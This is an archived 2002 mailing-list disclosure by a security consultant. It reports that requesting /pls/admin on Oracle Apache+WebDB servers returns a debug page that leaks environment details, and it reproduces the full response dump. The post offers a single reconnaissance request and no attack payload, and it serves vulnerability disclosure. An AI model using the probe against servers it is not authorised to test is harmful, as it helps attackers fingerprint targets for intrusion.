Correction - Oracle Apache+WebDB info leakege
From: Leandro Malaquias (wazupat_private)
Date: Sun Feb 03 2002 - 17:37:31 PST
Next message: Blue Boar: "Re: mIRC Buffer Overflow"
While I was going through the Oracle Apache+WebDB vulnerability, I found
something else also
interesting, I don't know if anyone has posted this before, but here it goes
any way.
If you reques the following: http://>:<port>/pls/admin
The following info is displayed:
Sun, 3 Feb 2002 19:57:12 GMT
No DAD configuration Found
DAD name:
PROCEDURE :
URL : http://>:<port>/pls/admin
PARAMETERS :
===========
ENVIRONMENT:
============
PLSQL_GATEWAY=WebDb
GATEWAY_IVERSION=2
SERVER_SOFTWARE=Apache/1.3.12 (Unix) ApacheJServ/1.1 mod_perl/1.22
GATEWAY_INTERFACE=CGI/1.1
SERVER_PORT= <port number>
SERVER_NAME= <hostname>
REQUEST_METHOD=GET
QUERY_STRING=
PATH_INFO=/admin
SCRIPT_NAME=/pls
REMOTE_HOST=
REMOTE_ADDR= <My IP>
SERVER_PROTOCOL=HTTP/1.1
REQUEST_PROTOCOL=HTTP
REMOTE_USER=
HTTP_CONTENT_LENGTH=
HTTP_CONTENT_TYPE=
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_HOST=<hostname:<port>
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-quickviewplus, */*
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT_LANGUAGE=en-us
HTTP_ACCEPT_CHARSET=
HTTP_COOKIE=
Authorization=
HTTP_IF_MODIFIED_SINCE=
Peace,
Leandro Malaquias
Consultor de Segurança em Redes
Network Security Consultant
This archive was generated by hypermail 2b30
: Sun Feb 03 2002 - 19:22:57 PST